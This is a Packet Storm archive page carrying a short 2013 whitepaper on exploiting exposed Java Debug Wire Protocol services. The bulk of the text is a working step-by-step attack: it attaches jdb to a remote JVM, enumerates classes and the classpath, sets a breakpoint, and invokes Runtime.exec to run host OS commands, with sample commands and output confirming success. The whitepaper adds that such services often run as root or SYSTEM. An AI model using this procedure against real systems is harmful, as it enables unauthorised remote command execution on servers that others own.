what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

JDWP Exploitation

JDWP Exploitation
Posted Jul 24, 2013
Authored by prdelka

This is a whitepaper discussing arbitrary java code execution leveraging the Java Debugging Wire Protocol (JDWP).

tags | exploit, java, arbitrary, code execution, protocol
SHA-256 | 0adc9316e503d0fe3daa7da5e64d578c4f345eb5aeee58462a82afd7494b1a6d

JDWP Exploitation

Change Mirror Download
JDWP Arbitrary Java Code Execution Exploitation
===============================================
Java Debugging Wire Protocol (JDWP) is the lowlevel protocol used for
communication between a debugger and a Java Virtual Machine (JVM) as outlined in
the Java Platform Debugger Architecture. It is often used to facilitate remote
debugging of a JVM over TCP/IP and can be identified by the initial protocol
handshake ascii string "JDWP-Handshake", sent first by the client and responded
to by the server. "jdb" is a proof-of-concept JDWP capable debugger included in
Oracle JDK and OpenJDK which can be used to interact with remote JDWP capable
services. Typically this service runs on TCP port 8000 however it can be found
to run on arbitrary TCP ports and is sometimes found enabled inadvertantly on
servers running Java services. It is possible to use this utility to exploit
remote JVM's and execute arbitrary Java code. An example shown here outlines
how to leverage this weakness to execute arbitrary host OS commands in the
context of the JVM.

$ jdb -attach x.x.x.x:8000
Set uncaught java.lang.Throwable
Set deferred uncaught java.lang.Throwable
Initializing jdb ...
>

Information leaks can be leveraged to determine details about the remote OS
platform and Java installation configuration through the "classpath" command.

> classpath
base directory: C:\Windows\system32
classpath: [ ** MASKED ** list of jar's loaded in remote JVM ]
bootclasspath: [ ** MASKED ** list of JRE paths ]
>

jdb is capable of performing remote object creation and method invokation from
within the CLI using the "print" "dump" and "eval" commands with the "new"
keyword. To determine the classes and methods available use the "classes" and
then "methods" on the corrosponding class.

> classes
...
java.lang.Runtime
...
> methods java.lang.Runtime
...
java.lang.Runtime exec(java.lang.String[])
...

It is often necessary to set the JDB context to be within a suspended thread or
breakpoint before attempting to create a new remote object class. Using the
"trace go methods" function can be used to identify a candidate for a breakpoint
and then "stop in your.random.class.method()" to halt the execution of a running
thread. When the execution is halted you can use "print new" to create your
class and invoke methods such as in the following example.

Breakpoint hit: "thread=threadname",your.random.class.method(), line=745 bci=0
threadname[1] print new java.lang.Runtime().exec("cmd.exe /c dir")
new java.lang.Runtime().exec("cmd.exe /c dir") = "java.lang.ProcessImpl@918502"
threadname[1] cont
>

Exploitation success will be determined from the output of the JDB process as
functions returning "null" or errors about "unsuspended thread state" would
indicate that exploitation was unsuccessful, however in the example above we can
see that the java created a new object "java.lang.ProcessImpl@918502" indicating
the "cmd.exe /c dir" was executed with success. On Linux this may need adjusting
to "java.lang.Runtime.getRuntime().exec()" however see the method / class
enumeration when attempting to exploit this flaw.


Your java will be executed in the context of the running JVM application, this
has been identified on services running as both "root" (*nix) and "SYSTEM"
(win32) in the wild.


-- prdelka
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close